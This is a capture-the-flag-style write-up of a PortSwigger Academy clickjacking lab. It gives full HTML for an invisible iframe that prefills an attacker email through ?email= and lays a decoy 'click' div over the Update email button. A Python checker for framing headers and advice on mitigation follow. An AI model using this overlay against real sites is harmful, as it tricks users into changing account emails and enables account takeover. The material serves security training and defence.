| Field | Value |
|---|---|
| Platform | PortSwigger Web Security Academy |
| Type | Clickjacking — Prefilled Form via URL Parameter |
| Difficulty | Apprentice |
| Objective | Trick the victim into clicking "Update email" with an attacker-controlled email already filled in |
# Clickjacking with Form Input Data Prefilled from a URL Parameter — Writeup

## Initial Observation
Logged in as wiener:peter. The account page has the usual email change form:
```html
<form class="login-form" name="change-email-form" action="/my-account/change-email" method="POST">
<label>Email</label>
<input required="" type="email" name="email" value="">
<input required="" type="hidden" name="csrf" value="nbryeYjdQ9iIk263ZFT6CO5LCXOD8ScR">
<button class="button" type="submit"> Update email </button>
</form>
```
Intercepting the email change request:
```http
POST /my-account/change-email HTTP/2
Host: 0a6e0053047645ff80e70df7001b0023.web-security-academy.net
Cookie: session=JCjknJqY5hjt2HxN9x7D18cw6x76zNe3

[email protected]&csrf=nbryeYjdQ9iIk263ZFT6CO5LCXOD8ScR
```
Testing whether the form can be prepopulated via a URL parameter, i.e. a query parameter with the same name as the input (`email`) on the `/my-account` page:

The input field already has the email value set. The form is ready to submit with attacker-controlled data, the victim just needs to click the button, and the CSRF token is still filled in by the page itself, so it does not stop this.
## Attack Path

### Building the Clickjacking Page
Same structure as the previous lab, but this time the iframe src includes the ?email= parameter to prefill the form. Placing the "click" div over the Update email button:
```html
<style>
iframe {
width: 500px;
height: 600px;
opacity: xxx; /* kept visible while aligning the overlay; lowered to 0.001 once the "click" div lines up */
}
div {
position: absolute;
top: 500px;
left: 40px;
}
</style>
<div>click</div>
<iframe src="https://0a6e0053047645ff80e70df7001b0023.web-security-academy.net/[email protected]"></iframe>
```
The "click" text is sitting right above the Update email button. Setting opacity: 0.001 to make the iframe invisible:
Deliver exploit to victim → victim clicks → email changes to [email protected] → lab solved :P
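The whole attack only works because the lab's `/my-account` response sends neither `X-Frame-Options` nor a CSP `frame-ancestors` directive. As an added defender-side example (not the lab's or PortSwigger's code), the check below takes a response's headers and decides whether a given embedding origin would be allowed to frame the page; the header values and origins it is run against are constructed samples, not captured from the lab.

```python
from urllib.parse import urlsplit

def _frame_ancestors(csp):
    """Source list of the frame-ancestors directive, or None if the CSP lacks it."""
    for directive in csp.split(";"):
        tokens = directive.split()
        if tokens and tokens[0].lower() == "frame-ancestors":
            return [t.lower() for t in tokens[1:]]
    return None

def _source_allows(src, embedder, target):
    """Does one frame-ancestors source expression match the embedding origin?"""
    if src == "'self'":
        return embedder == target
    if src == "*":
        return True
    emb = urlsplit(embedder)
    if src.endswith(":"):                       # scheme-source such as "https:"
        return emb.scheme + ":" == src
    parsed = urlsplit(src if "://" in src else "//" + src)
    if parsed.scheme and parsed.scheme != emb.scheme:
        return False
    host, emb_host = parsed.hostname or "", emb.hostname or ""
    if host.startswith("*."):                   # host-source with a wildcard label
        return emb_host.endswith(host[1:])
    return emb_host == host                     # port matching deliberately omitted

def framable_from(headers, embedder_origin, target_origin):
    """True if a browser would render target_origin inside an iframe on embedder_origin.
    frame-ancestors, when present, is authoritative and X-Frame-Options is ignored;
    with neither header the page is framable from anywhere, as this lab's page is."""
    h = {k.lower(): v for k, v in headers.items()}
    sources = _frame_ancestors(h.get("content-security-policy", ""))
    if sources is not None:
        if not sources or sources == ["'none'"]:
            return False
        return any(_source_allows(s, embedder_origin, target_origin) for s in sources)
    xfo = h.get("x-frame-options", "").strip().lower()
    if xfo == "deny":
        return False
    if xfo == "sameorigin":
        return embedder_origin == target_origin
    return True

# Constructed samples: the lab's response carries neither header; the hardened
# set is what would have stopped the exploit server's page from framing it.
LAB_HEADERS = {"Content-Type": "text/html; charset=utf-8"}
HARDENED_HEADERS = {"Content-Security-Policy": "frame-ancestors 'self'",
                    "X-Frame-Options": "DENY"}
```

Either header alone closes the hole here; the prefill via `?email=` is harmless on its own once the page can no longer be framed, but removing the prefill is still worth doing since it is what makes the single click sufficient.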
## Resources
- PortSwigger — Clickjacking
- PortSwigger — Clickjacking with prefilled form input
- MDN — X-Frame-Options
- MDN — CSP frame-ancestors
- Burp Suite Professional — Clickbandit, exploit server